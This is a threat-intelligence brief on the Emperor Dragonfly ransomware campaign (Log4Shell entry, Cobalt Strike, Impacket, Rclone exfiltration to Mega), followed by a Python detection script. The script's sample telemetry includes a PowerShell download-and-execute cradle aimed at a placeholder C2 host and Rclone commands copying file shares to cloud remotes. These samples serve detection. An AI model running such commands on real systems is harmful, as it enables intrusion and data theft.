The Newly Rebranded Emperor Dragonfly Strikes
Category: Threat Actor Activity | Industry: N/A | Level: Tactical | Source: Sygnia
Researchers from Sygnia discovered that the threat groups Cheerscrypt and Night Sky have rebranded into a newly formed group, "Emperor Dragonfly." The group's activity was uncovered during an incident response investigation spanning several months, and the tactics, techniques, and procedures (TTPs) used align with those of Night Sky.

The campaign began in January 2022 with the compromise of a VMware Horizon server through the Log4Shell vulnerability, CVE-2021-44228. Following the exploit, PowerShell commands were executed to conduct reconnaissance, download payloads, and communicate with the attacker's command and control (C&C) server. Cobalt Strike Beacons were downloaded as DLL files and side-loaded to be weaponized. As noted by Sygnia, "This method of Cobalt Strike deployment is a known TTP of the Night Sky operators, and the Beacon was downloaded from a known Night Sky C&C server. However, what Sygnia discovered next was surprising: in parallel to the Beacon deployment, three tools written in Go were also deployed. These binaries were compiled from open-source projects, created by Chinese-speaking developers, with documentation in English and Chinese." During the lateral movement phase, the threat actors used the Impacket modules 'SMBExec.py' and 'WMIExec.py'. In the final phase of the campaign, data was exfiltrated with Rclone to Mega cloud storage, and encryption was carried out with the Cheerscrypt ransomware.

Emperor Dragonfly's affiliation is unknown; the tools developed by the group are written in Chinese, which suggests a potential allegiance to China. However, little is known about the Cheerscrypt threat actors, who in past activity identified themselves as pro-Ukrainian.
- Emperor Dragonfly: Establishes Foothold & Lateral Movement
Anvilogic Use Cases:
- Potential CVE-2021-44228 - Log4Shell
- Go Run Execution
- Rclone Execution
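The three use cases above map onto the chain described in the brief: a PowerShell download cradle spawned by the exploited Horizon server's Java process, Impacket lateral movement, and Rclone exfiltration to a cloud remote. The following is an added example, not Sygnia's or Anvilogic's code, that runs such rules over constructed process-creation telemetry; it assumes Horizon's parent process name contains "java" or "tomcat" and uses the default wmiexec.py lineage (WmiPrvSE.exe spawning cmd.exe that writes output to \\127.0.0.1\ADMIN$), both of which an operator can alter.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation event: parent image, child image, command line."""
    parent: str
    image: str
    cmdline: str

# Rules as (name, stage, parent regex, image regex, command-line regex), mirroring the
# chain in the brief: PowerShell cradle under the Horizon Java process, the default
# wmiexec.py lineage, and Rclone writing to a cloud remote such as Mega.
RULES = [
    ("log4shell_postexploit_powershell", "foothold",
     r"(?i)(java|tomcat|horizon)", r"(?i)^powershell(\.exe)?$",
     r"(?i)(DownloadString|DownloadFile|IEX|Invoke-Expression|FromBase64String|-enc)"),
    ("impacket_wmiexec", "lateral_movement", r"(?i)^WmiPrvSE\.exe$", r"(?i)^cmd\.exe$",
     r"(?i)\\\\127\.0\.0\.1\\ADMIN\$\\__.*2>&1"),
    # A remote is "name:" not followed by a path separator, so C:\ and D:\ do not match.
    ("rclone_cloud_remote", "exfiltration", r".*", r"(?i)^rclone(\.exe)?$",
     r"(?i)\b(copy|sync|move)\b.*\b[A-Za-z][\w-]*:(?![\\/])"),
]

def detect(events):
    """Return [(rule_name, event_index)] for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for name, _stage, parent_re, image_re, cmd_re in RULES:
            if (re.search(parent_re, ev.parent) and re.search(image_re, ev.image)
                    and re.search(cmd_re, ev.cmdline)):
                hits.append((name, idx))
    return hits

def stages_seen(hits):
    """Map hits to intrusion stages; a host showing all three is triaged as a full chain."""
    stage_of = {name: stage for name, stage, *_ in RULES}
    return {stage_of[name] for name, _ in hits}

# Constructed sample telemetry, not from the incident; the C2 URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent("java.exe", "powershell.exe", "powershell -nop -w hidden -c "
              "IEX((New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a'))"),
    ProcEvent("WmiPrvSE.exe", "cmd.exe",
              r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1653421234.5 2>&1"),
    ProcEvent("cmd.exe", "rclone.exe", r"rclone.exe copy D:\Shares\Finance mega:backup -q"),
    ProcEvent("explorer.exe", "rclone.exe", r"rclone.exe sync C:\Users\bob\docs onedrive:docs"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem"),
]
```

Running `detect(SAMPLE_EVENTS)` flags the first four events and leaves the interactive PowerShell alone; `stages_seen` on those hits returns all three stages, which is the correlation an analyst wants before declaring a full intrusion chain.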